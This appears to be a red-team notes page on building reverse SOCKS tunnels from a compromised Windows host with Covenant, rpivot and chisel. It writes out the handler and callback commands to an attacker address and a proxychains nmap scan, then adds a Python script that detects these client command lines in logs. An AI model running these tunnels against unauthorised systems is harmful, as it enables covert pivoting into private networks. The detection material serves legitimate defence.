# Covenant Reverse Socks Proxy

Cobalt Strike has this neat feature where you can start a SOCKS proxy on a beacon to tunnel traffic with proxychains. You can do something similar with some PowerShell and Covenant.

https://github.com/p3nt4/Invoke-SocksProxy

Import the invoke-socksproxy.psm1:

```
powershellimport
```

Create an SSL cert:

```
openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout private.key -out cert.pem
openssl x509 -in cert.pem -noout -sha1 -fingerprint | cut -d "=" -f 2 | tr -d ":"
```

Set up a handler:

```
python ReverseSocksProxyHandler.py 443 1080 ./cert.pem ./private.key
```

Set up a connection:

```
powershell Invoke-ReverseSocksProxy -remotePort 443 -remoteHost 10.10.14.x
```

Use proxychains:

```
proxychains nmap -sT -Pn 10.10.x.x
```

All in all, a pretty neat way to do a poor man's tunnel.

These two other projects have served me well too:

https://github.com/klsecservices/rpivot

```
python server.py --proxy-port 1080 --server-port 9999 --server-ip 0.0.0.0
python client.py --server-ip <ip> --server-port 9999
```

https://github.com/jpillora/chisel

```
./chisel server -p 8080 --reverse
chisel-x64.exe client 10.10.14.x:8080 R:1081:socks
```

Use socks5, not socks4.

https://medium.com/@vegardw/reverse-socks-proxy-using-chisel-the-easy-way-48a78df92f29

https://m0chan.github.io/2019/07/30/Windows-Notes-and-Cheatsheet.html
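
On the detection side, the client command lines shown on this page are distinctive enough to use as signatures. The following is an added example, not code from the original post or from any of the linked projects: it scans process-creation or PowerShell script-block events for the three client invocations above and extracts the tunnel endpoint for triage. The event field names (`computer`, `cmdline`) and the sample events are constructed for illustration.

```python
import re

# Signatures built only from the client command lines shown on this page.
# Each rule: pattern identifying the tool, then patterns for the tunnel endpoint.
RULES = {
    "Invoke-ReverseSocksProxy": (r"\binvoke-reversesocksproxy\b",
        {"host": r"-remotehost\s+(\S+)", "port": r"-remoteport\s+(\d+)"}),
    "chisel reverse socks": (r"\bclient\s+\S+\s+(?:.*\s)?r:(?:\d+:)?socks\b",
        {"host": r"\bclient\s+([^\s:]+):\d+", "port": r"\bclient\s+[^\s:]+:(\d+)"}),
    "rpivot client": (r"\bclient\.py\b(?=.*--server-ip\b)(?=.*--server-port\b)",
        {"host": r"--server-ip\s+(\S+)", "port": r"--server-port\s+(\d+)"}),
}

def normalise(cmdline):
    """Lower-case; drop quote/escape characters (" ' ^ `) and repeated spaces."""
    return re.sub(r"\s+", " ", re.sub(r"[\"'^`]", "", cmdline)).strip().lower()

def scan(events):
    """Return one finding per event whose command line matches a rule."""
    findings = []
    for ev in events:
        text = normalise(ev["cmdline"])
        for name, (tool_re, fields) in RULES.items():
            if not re.search(tool_re, text):
                continue
            hit = {"rule": name, "computer": ev["computer"]}
            for field, pattern in fields.items():
                m = re.search(pattern, text)
                hit[field] = m.group(1) if m else None  # None: argument absent
            findings.append(hit)
            break  # first matching rule wins
    return findings

# Constructed sample events (hypothetical hosts and field names, not real telemetry).
SAMPLE_EVENTS = [
    {"computer": "WS01", "cmdline": "powershell Invoke-ReverseSocksProxy -remotePort 443 -remoteHost 10.10.14.x"},
    {"computer": "WS02", "cmdline": "chisel-x64.exe client 10.10.14.x:8080 R:1081:socks"},
    {"computer": "WS03", "cmdline": "python client.py --server-port 9999 --server-ip 192.0.2.10"},
    {"computer": "WS04", "cmdline": "python client.py --help"},            # benign
    {"computer": "WS05", "cmdline": "ssh.exe -o ProxyCommand=none client"},  # benign
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Matching on arguments rather than binary names keeps the rules working when the executable is renamed; pair them with network telemetry for the extracted host and port.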